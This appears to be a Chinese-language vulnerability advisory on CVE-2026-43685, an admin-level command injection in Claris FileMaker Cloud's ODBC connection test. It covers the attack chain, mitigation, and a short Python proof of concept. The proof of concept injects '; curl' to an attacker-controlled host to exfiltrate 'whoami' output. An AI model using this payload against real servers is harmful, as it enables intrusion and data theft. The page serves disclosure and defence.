CVE-2026-43685 CVSS 7.2 高危

CVE-2026-43685 Clairs FileMaker Cloud 远程代码执行漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43685

漏洞类型

远程代码执行 (RCE) / 命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Claris FileMaker Cloud

漏洞概述

Claris FileMaker Cloud 中存在一个远程代码执行漏洞。该漏洞允许具有管理控制台权限的用户，利用外部 ODBC 数据源连接测试功能中未经过滤的输入，注入任意操作系统命令。成功利用此漏洞可能导致攻击者在服务器上执行任意代码，从而完全控制受影响系统。该问题已在 FileMaker Cloud 2.22.0.5 版本中得到修复。

技术细节

该漏洞的根源在于 Claris FileMaker Cloud 的 Admin Console 中，用于测试外部 ODBC 数据源连接的组件未能对用户输入进行严格的验证和清理。当拥有管理员权限的用户配置或测试 ODBC 数据源时，应用程序直接将用户提供的参数传递给底层的系统命令执行接口。由于缺乏有效的输入过滤机制，攻击者可以通过构造恶意的 ODBC 连接字符串或参数，将特定的操作系统命令注入到后端执行环境中。虽然利用此漏洞需要较高的权限（PR:H），但一旦成功，攻击者即可利用 Web 服务器的上下文权限执行任意系统命令（如反弹 Shell、读写敏感文件等），从而造成数据泄露、系统被控等严重后果。

攻击链分析

STEP 1

1. 权限获取

攻击者首先需要获取 Claris FileMaker Cloud Admin Console 的高权限账户访问权限。

STEP 2

2. 访问功能点

登录后台后，导航至外部 ODBC 数据源配置或测试功能页面。

STEP 3

3. 构造 Payload

在 ODBC 连接字符串或相关输入字段中，插入包含操作系统命令分隔符（如 ; 或 &&）的恶意代码。

STEP 4

4. 执行命令

提交测试请求，服务器端因未过滤输入而执行注入的系统命令，攻击者获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example API endpoint for ODBC test)
target_url = "https://<filemaker-cloud-host>/admin/api/data-sources/test-connection"

# Malicious payload attempting command injection
# Example: using a semicolon to chain a command in Linux/Unix
cmd_payload = "; curl http://attacker-controlled-server/$(whoami)"

# Headers with admin session cookie (requires High Privilege)
headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": "X-Claris-Session=valid_admin_session_token_here",
    "Content-Type": "application/json"
}

# Data payload targeting the ODBC connection string field
data = {
    "name": "ExploitDB",
    "type": "odbc",
    "connectionString": f"DRIVER={{MySQL}};SERVER=127.0.0.1{cmd_payload};DATABASE=test;"
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, json=data, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Claris FileMaker Cloud < 2.22.0.5

防御指南

临时缓解措施

在未升级之前，建议通过防火墙严格限制管理控制台的访问来源IP，仅允许内部运维网络访问，并加强对管理员账号的异常登录监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表